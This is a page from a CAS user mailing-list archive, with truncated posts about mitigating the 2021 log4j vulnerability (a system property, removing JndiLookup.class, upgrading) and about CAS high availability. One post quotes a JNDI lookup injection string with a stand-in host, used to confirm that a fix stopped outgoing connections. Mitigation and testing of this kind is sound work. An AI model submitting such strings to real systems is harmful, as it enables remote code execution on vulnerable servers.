Re: [cas-user] log4j vulnerability

2021-12-10 Thread 'Richard Frovarp' via CAS Community
Using a new enough version of the JDK might also alleviate it? The other option is to throw the config option at the JDK to stop it from happening. That would seem to be easiest. On 12/10/21 12:36 PM, King, Robert wrote: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 Has

Re: [cas-user] log4j vulnerability

2021-12-10 Thread 'Richard Frovarp' via CAS Community
Maybe? The one that I've seen https://logging.apache.org/log4j/2.x/security.html says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to your JVM and not in the config file. On 12/10/21 12:55 PM, Mike Osterman wrote: Yeah, it seems like setting the log4j2.formatMsgNoLookups

Re: [cas-user] CAS High Availability

2021-12-10 Thread Ray Bon
Baba, We use round robin with 4 cas servers and use hazelcast for ticket storage. Round robin is managed by the load balancer in prod. Whatever you use for ticket storage has to be fast enough so that the second server knows about the tickets before they are validated by the services. On my

[cas-user] log4j2 vulnerability

2021-12-10 Thread Manuel Cones
Hello, due the recent discovered log4j2 vulnerability, whats the way to mitigate it? should i add log4j2.formatMsgNoLookups=true to the cas.properties file? Thanks in Advance, Manuel. -- - Website: https://apereo.github.io/cas - Gitter Chatroom: https://gitter.im/apereo/cas - List

Re: [cas-user] log4j vulnerability

2021-12-10 Thread Adam Franco
I've rebuilt CAS with log4j 2.15.0 and confirmed that doing so stopped outgoing connections when a line like ${jndi:rmi://www.example.com:80/test} was submitted in the username field (I used a real hostname rather than www.example.com). We were able to verify this fix with tcpdump on the CAS

Re: [cas-user] log4j vulnerability

2021-12-10 Thread Mike Osterman
Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in the log4j2.xml config file might do to trick. I'm guessing we'd do that somewhere here at the top? /etc/cas/logs On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <

RE: [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability

2021-12-10 Thread King, Robert
Just rolled out this mitigation to our servers, seems to be effective for CAS 6.3.x builds. Our environment for reference: - Standalone Tomcat - OpenJDK - CAS and CAS-Management as deployed jars - CAS and CAS-Mangement built from cas-overlay and cas-management-overlay repos. Mitigated by

[cas-user] log4j vulnerability

2021-12-10 Thread King, Robert
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 Has anyone attempted to mitigate this CVE yet? There seems to be two possible approaches to mitigation: 1 The sledgehammer approach of removing the JndiLookup.class from the jar files: zip -q -d log4j-core-*.jar

[cas-user] CAS High Availability

2021-12-10 Thread Baba Ndiaye
I want to set up a high availability solution for my CAS servers and i want some solutions for that i want to use DNS round Robin *cluster (cas1.myorganisation.edu cas2.myorganisation.edu) *DNS round robin If you already implement it i need your help please. -- - Website: